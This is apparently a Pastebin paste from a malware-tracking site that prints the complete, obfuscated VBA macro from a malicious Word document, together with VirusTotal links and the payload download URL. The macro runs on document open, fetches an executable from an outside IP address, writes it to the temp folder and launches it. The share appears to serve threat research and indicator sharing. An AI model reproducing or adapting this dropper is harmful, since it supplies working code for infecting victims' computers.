API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 21st, 2014
266
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.17 KB | None | 0 0
raw download clone embed print report
  1. hi from techhelplist.com
  2.  
  3. macro from malicious .doc:
  4. https://www.virustotal.com/en/file/da7ce3828873c467ecf7d51c34bc354ae7947192d36075d571bebb4b1298ea5a/analysis/
  5.  
  6. tl;dr:
  7. downloads : http://79.137.227.123:8080/get1/get1.php == test.exe
  8. https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/
  9. ---------------------------------------------------------
  10.  
  11. Rem Attribute VBA_ModuleType=VBADocumentModule
  12. Option VBASupport 1
  13. Function kcdygwrfbiu(ByVal yjgkqifjhuh As String, ByVal wyribcufvdf As String) As Boolean
  14. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  15. Dim ybkppsihihv As Object, ytzewczgyac As Long, dffgyvolwmr As Long, sleabtnazmz() As Byte
  16.  
  17. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  18. If 198146 = 198146 + 1 Then End
  19. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  20. If 7839 < 72 Then
  21. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  22. MsgBox ("ydsyzxcl64")
  23. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  24. End If
  25. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  26. If Len("ykqxxxyl2193") = Len("appahzmy") Then
  27. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  28. MsgBox ("error !!!")
  29. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  30. End If
  31. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  32. Set ybkppsihihv = CreateObject("msxml2.xmlhttp")
  33.  
  34. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  35. ybkppsihihv.Open "GET", yjgkqifjhuh, False
  36. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  37. If 521349 = 521349 + 1 Then End
  38. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  39. If 8893 < 54 Then
  40. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  41. MsgBox ("likijweg67")
  42. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  43. End If
  44. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  45. If Len("pllhkrlc3166") = Len("sxxznekr") Then
  46. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  47. MsgBox ("error !!!")
  48. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  49. End If
  50. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  51. ybkppsihihv.send "VVhjk"
  52.  
  53.  
  54.  
  55.  
  56. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  57. If 376139 = 376139 + 1 Then End
  58. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  59. If 4393 < 36 Then
  60. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  61. MsgBox ("ezhdcheq72")
  62. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  63. End If
  64. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  65. If Len("pkmsyove5253") = Len("tsljbgsj") Then
  66. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  67. MsgBox ("error !!!")
  68. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  69. End If
  70. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  71. sleabtnazmz = ybkppsihihv.responsebody
  72.  
  73.  
  74. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  75. If 715735 = 715735 + 1 Then End
  76. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  77. If 4641 < 12 Then
  78. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  79. MsgBox ("ryjrhqnx53")
  80. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  81. End If
  82. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  83. If Len("dygrzarq8814") = Len("gojjpnrl") Then
  84. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  85. MsgBox ("error !!!")
  86. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  87. End If
  88. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  89. dffgyvolwmr = FreeFile
  90.  
  91. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  92. Open wyribcufvdf For Binary As #dffgyvolwmr
  93. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  94. If 729374 = 729374 + 1 Then End
  95. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  96. If 4942 < 43 Then
  97. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  98. MsgBox ("nnyvcjng26")
  99. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  100. End If
  101. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  102. If Len("fnfymeib5882") = Len("olspfiwd") Then
  103. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  104. MsgBox ("error !!!")
  105. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  106. End If
  107. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  108. Put #dffgyvolwmr, , sleabtnazmz
  109.  
  110. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  111. If 935867 = 935867 + 1 Then End
  112. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  113. If 7842 < 34 Then
  114. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  115. MsgBox ("lkhqhnue85")
  116. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  117. End If
  118. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  119. If Len("ekdpzjqk1116") = Len("rwhcqgpb") Then
  120. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  121. MsgBox ("error !!!")
  122. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  123. End If
  124. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  125. Close #dffgyvolwmr
  126.  
  127. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  128. If 767893 = 767893 + 1 Then End
  129. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  130. If 7329 < 99 Then
  131. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  132. MsgBox ("xvbnvbmi21")
  133. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  134. End If
  135. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  136. If Len("rfebukjb1584") = Len("vuaenced") Then
  137. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  138. MsgBox ("error !!!")
  139. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  140. End If
  141. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  142.  
  143.  
  144. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  145. If 642238 = 642238 + 1 Then End
  146. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  147. If 9112 < 66 Then
  148. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  149. MsgBox ("awvnauwt56")
  150. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  151. End If
  152. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  153. If Len("kynuzhsf1962") = Len("lpemqgqm") Then
  154. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  155. MsgBox ("error !!!")
  156. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  157. End If
  158. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  159. Set bikhbouivbl = CreateObject("shell.application")
  160.  
  161. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  162. bikhbouivbl.Open Environ("temp") & "\VYEJIUNSXLI.exe"
  163. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  164. If 863523 = 863523 + 1 Then End
  165. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  166. If 8277 < 29 Then
  167. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  168. MsgBox ("tczpuufm31")
  169. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  170. End If
  171. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  172. If Len("ddyihaps3541") = Len("mafrfkwq") Then
  173. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  174. MsgBox ("error !!!")
  175. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  176. End If
  177. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  178.  
  179.  
  180.  
  181. End Function
  182. Sub auto_open()
  183. If 342198 = 342198 + 1 Then End
  184. If 6121 < 36 Then
  185. MsgBox ("pwnlbmeg41")
  186. End If
  187. If Len("ayzaarmc1384") = Len("zprgozle") Then
  188. MsgBox ("error !!!")
  189. End If
  190. vmmtnyfyoid
  191.  
  192. End Sub
  193. Sub autoopen()
  194. If 579373 = 579373 + 1 Then End
  195. If 2541 < 28 Then
  196. MsgBox ("nvgsfxxv92")
  197. End If
  198. If Len("nefeixyc5714") = Len("wxsiaalq") Then
  199. MsgBox ("error !!!")
  200. End If
  201. auto_open
  202.  
  203. End Sub
  204. Sub workbook_open()
  205. If 881586 = 881586 + 1 Then End
  206. If 8712 < 53 Then
  207. MsgBox ("gmlldavd95")
  208. End If
  209. If Len("shniernf9662") = Len("dlzwszbm") Then
  210. MsgBox ("error !!!")
  211. End If
  212. auto_open
  213.  
  214. End Sub
  215. Sub vmmtnyfyoid()
  216. If 393732 = 393732 + 1 Then End
  217. If 3669 < 39 Then
  218. MsgBox (hextostring(Chr$(55) & Chr$(65) & Chr$(52) & Chr$(56) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(53) & Chr$(51) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(69) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(52)))
  219. End If
  220. If Len(hextostring(Chr$(52) & Chr$(70) & Chr$(55) & Chr$(57) & Chr$(53) & Chr$(65) & Chr$(52) & Chr$(51) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(69) & Chr$(55) & Chr$(56) & Chr$(52) & Chr$(67) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(57))) = Len(hextostring(Chr$(52) & Chr$(53) & Chr$(54) & Chr$(50) & Chr$(54) & Chr$(49) & Chr$(53) & Chr$(65) & Chr$(52) & Chr$(54) & Chr$(55) & Chr$(57) & Chr$(53) & Chr$(48) & Chr$(55) & Chr$(53))) Then
  221. MsgBox (hextostring(Chr$(52) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(50) & Chr$(48) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49)))
  222. End If
  223. fdgjhhibjkl7gik = hextostring(Chr$(54) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(48) & Chr$(51) & Chr$(65) & Chr$(50) & Chr$(70) & Chr$(50) & Chr$(70) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(57) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(49) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(49) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(65) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(48) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(48) & Chr$(50) & Chr$(70) & Chr$(54) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(51) & Chr$(49) & Chr$(50) & Chr$(70) & Chr$(54) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(51) & Chr$(49) & Chr$(50) & Chr$(69) & Chr$(55) & Chr$(48) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(48))
  224.  
  225. If 485913 = 485913 + 1 Then End
  226. If 7649 < 42 Then
  227. MsgBox (hextostring(Chr$(52) & Chr$(54) & Chr$(53) & Chr$(56) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(70) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(68) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(49)))
  228. End If
  229. If Len(hextostring(Chr$(55) & Chr$(52) & Chr$(55) & Chr$(57) & Chr$(54) & Chr$(56) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(54) & Chr$(67) & Chr$(53) & Chr$(48) & Chr$(53) & Chr$(65) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(57))) = Len(hextostring(Chr$(54) & Chr$(67) & Chr$(54) & Chr$(55) & Chr$(52) & Chr$(70) & Chr$(52) & Chr$(66) & Chr$(54) & Chr$(67) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(51))) Then
  230. MsgBox (hextostring(Chr$(52) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(50) & Chr$(48) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49)))
  231. End If
  232. kcdygwrfbiu fdgjhhibjkl7gik, Environ(hextostring(Chr$(53) & Chr$(52) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(68) & Chr$(53) & Chr$(48))) & hextostring(Chr$(53) & Chr$(67) & Chr$(53) & Chr$(54) & Chr$(53) & Chr$(57) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(65) & Chr$(52) & Chr$(57) & Chr$(53) & Chr$(53) & Chr$(52) & Chr$(69) & Chr$(53) & Chr$(51) & Chr$(53) & Chr$(56) & Chr$(52) & Chr$(67) & Chr$(52) & Chr$(57) & Chr$(50) & Chr$(69) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(54) & Chr$(53))
  233.  
  234. End Sub
  235. Public Function hextostring(ByVal nhcqwfgej As String) As String
  236. Dim nuzmlbfhz As String
  237. Dim ogqyauxcpbviwij As String
  238. Dim fgofrw As Long
  239. For fgofrw = 1 To Len(nhcqwfgej) Step 2
  240. If 987234 = 987234 + 1 Then End
  241. If 7639 < 69 Then
  242. MsgBox ("dibkwffc53")
  243. End If
  244. If Len("aiuvlbwo8571") = Len("xayestix") Then
  245. MsgBox ("error !!!")
  246. End If
  247. nuzmlbfhz = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(nhcqwfgej, fgofrw, 2)))
  248.  
  249. If 243388 = 243388 + 1 Then End
  250. If 2439 < 55 Then
  251. MsgBox ("avaykopy31")
  252. End If
  253. If Len("bmiwoqdu3279") = Len("dzzkdvfa") Then
  254. MsgBox ("error !!!")
  255. End If
  256. ogqyauxcpbviwij = ogqyauxcpbviwij & nuzmlbfhz
  257.  
  258. Next fgofrw
  259. If 987435 = 987435 + 1 Then End
  260. If 7623 < 69 Then
  261. MsgBox ("arrvwigd53")
  262. End If
  263. If Len("apefhibs8563") = Len("wzalodsn") Then
  264. MsgBox ("error !!!")
  265. End If
  266. hextostring = ogqyauxcpbviwij
  267.  
  268. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!